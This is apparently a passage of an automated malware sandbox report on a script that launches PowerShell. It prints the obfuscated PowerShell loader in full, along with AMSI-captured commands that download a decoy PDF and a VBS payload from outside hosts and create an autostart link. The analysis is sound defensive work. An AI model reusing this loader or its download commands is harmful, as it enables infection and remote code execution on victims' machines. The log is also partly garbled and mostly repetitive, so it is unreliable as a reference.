Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok Rekoe
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF7C0F07613 push edi; ret 2_2_00007FF7C0F07616
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF7C0F00D6C push eax; ret 5_2_00007FF7C0F00D6D

          Boot Survival

          barindex
          Powershell creates an autostart link
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'List of Required items and services.pdf') -oulv 'htb2hwww.fornid.com/wh/List%20of%20rualquiruald%20itualms%20and%20sualrvicuals.pdf';getit -fz $flol -oulv 'htb2hwww.pinualapplualtualch.aual/na/mg.vbs';exit@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this mod

          Hooking and other Techniques for Hiding and Protection

          barindex
          Loading BitLocker PowerShell Module
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
